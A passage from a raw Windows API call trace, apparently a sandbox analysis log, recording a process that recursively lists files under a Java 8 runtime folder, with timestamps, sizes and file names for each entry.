ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0de2f82, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xafba0b05, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jre1.8.0_144", cAlternateFileName="JRE18~1.0_1")) returned 1 [0179.384] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x43d5090 [0179.385] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\*", lpFindFileData=0x339f584 | out: lpFindFileData=0x339f584*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xa235ac5b, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0de2f82, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xafba0b05, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x43a2ad8 [0179.385] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x339f584 | out: lpFindFileData=0x339f584*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xa235ac5b, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0de2f82, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xafba0b05, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0179.385] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x339f584 | out: lpFindFileData=0x339f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa7406c5a, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0eaff93, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bin", cAlternateFileName="")) returned 1 [0179.385] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x43e5098 [0179.385] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\*", lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa7406c5a, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0eaff93, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x43a28d8 [0179.385] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa7406c5a, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0eaff93, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.385] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x172440, dwReserved0=0x0, dwReserved1=0x0, cFileName="awt.dll", cAlternateFileName="")) returned 1 [0179.385] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bci.dll", cAlternateFileName="")) returned 1 [0179.385] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x27040, dwReserved0=0x0, dwReserved1=0x0, cFileName="dcpr.dll", cAlternateFileName="")) returned 1 [0179.386] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x15040, dwReserved0=0x0, dwReserved1=0x0, cFileName="decora_sse.dll", cAlternateFileName="DECORA~1.DLL")) returned 1 [0179.386] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x8f840, dwReserved0=0x0, dwReserved1=0x0, cFileName="deploy.dll", cAlternateFileName="")) returned 1 [0179.386] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0f2891a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="dtplugin", cAlternateFileName="")) returned 1 [0179.386] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x43f50a0 [0179.386] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\*", lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0f2891a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x43a2c98 [0179.386] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0f2891a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0179.386] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xfa840, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="deployJava1.dll", cAlternateFileName="DEPLOY~1.DLL")) returned 1 [0179.386] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x11a640, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="npdeployJava1.dll", cAlternateFileName="NPDEPL~1.DLL")) returned 1 [0179.387] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x11a640, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="npdeployJava1.dll", cAlternateFileName="NPDEPL~1.DLL")) returned 0 [0179.387] FindClose (in: hFindFile=0x43a2c98 | out: hFindFile=0x43a2c98) returned 1 [0179.387] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0179.387] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x7440, dwReserved0=0x0, dwReserved1=0x0, cFileName="dt_shmem.dll", cAlternateFileName="")) returned 1 [0179.387] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x6040, dwReserved0=0x0, dwReserved1=0x0, cFileName="dt_socket.dll", cAlternateFileName="DT_SOC~1.DLL")) returned 1 [0179.387] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x21440, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.dll", cAlternateFileName="")) returned 1 [0179.387] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x43040, dwReserved0=0x0, dwReserved1=0x0, cFileName="fontmanager.dll", cAlternateFileName="FONTMA~1.DLL")) returned 1 [0179.387] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2da40, dwReserved0=0x0, dwReserved1=0x0, cFileName="fxplugins.dll", cAlternateFileName="FXPLUG~1.DLL")) returned 1 [0179.388] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x40e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="glass.dll", cAlternateFileName="")) returned 1 [0179.388] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x6f440, dwReserved0=0x0, dwReserved1=0x0, cFileName="glib-lite.dll", cAlternateFileName="GLIB-L~1.DLL")) returned 1 [0179.388] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x97440, dwReserved0=0x0, dwReserved1=0x0, cFileName="gstreamer-lite.dll", cAlternateFileName="GSTREA~1.DLL")) returned 1 [0179.388] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x26a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="hprof.dll", cAlternateFileName="")) returned 1 [0179.388] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1e240, dwReserved0=0x0, dwReserved1=0x0, cFileName="instrument.dll", cAlternateFileName="INSTRU~1.DLL")) returned 1 [0179.388] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="j2pcsc.dll", cAlternateFileName="")) returned 1 [0179.389] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xf840, dwReserved0=0x0, dwReserved1=0x0, cFileName="j2pkcs11.dll", cAlternateFileName="")) returned 1 [0179.389] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x5240, dwReserved0=0x0, dwReserved1=0x0, cFileName="jaas_nt.dll", cAlternateFileName="")) returned 1 [0179.389] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x8640, dwReserved0=0x0, dwReserved1=0x0, cFileName="jabswitch.exe", cAlternateFileName="JABSWI~1.EXE")) returned 1 [0179.389] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="java-rmi.exe", cAlternateFileName="")) returned 1 [0179.389] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x27040, dwReserved0=0x0, dwReserved1=0x0, cFileName="java.dll", cAlternateFileName="")) returned 1 [0179.389] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x32840, dwReserved0=0x0, dwReserved1=0x0, cFileName="java.exe", cAlternateFileName="")) returned 1 [0179.389] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x22c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="JavaAccessBridge-64.dll", cAlternateFileName="JAVAAC~1.DLL")) returned 1 [0179.390] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2dc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="javacpl.cpl", cAlternateFileName="")) returned 1 [0179.390] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x13a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="javacpl.exe", cAlternateFileName="")) returned 1 [0179.390] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x10e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="javafx_font.dll", cAlternateFileName="JAVAFX~1.DLL")) returned 1 [0179.390] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x83640, dwReserved0=0x0, dwReserved1=0x0, cFileName="javafx_font_t2k.dll", cAlternateFileName="JAVAFX~2.DLL")) returned 1 [0179.390] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1f440, dwReserved0=0x0, dwReserved1=0x0, cFileName="javafx_iio.dll", cAlternateFileName="JAVAFX~3.DLL")) returned 1 [0179.390] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x32840, dwReserved0=0x0, dwReserved1=0x0, cFileName="javaw.exe", cAlternateFileName="")) returned 1 [0179.390] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4e040, dwReserved0=0x0, dwReserved1=0x0, cFileName="javaws.exe", cAlternateFileName="")) returned 1 [0179.391] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x7440, dwReserved0=0x0, dwReserved1=0x0, cFileName="java_crw_demo.dll", cAlternateFileName="JAVA_C~1.DLL")) returned 1 [0179.391] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3840, dwReserved0=0x0, dwReserved1=0x0, cFileName="jawt.dll", cAlternateFileName="")) returned 1 [0179.391] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="JAWTAccessBridge-64.dll", cAlternateFileName="JAWTAC~1.DLL")) returned 1 [0179.391] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x31440, dwReserved0=0x0, dwReserved1=0x0, cFileName="jdwp.dll", cAlternateFileName="")) returned 1 [0179.391] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, 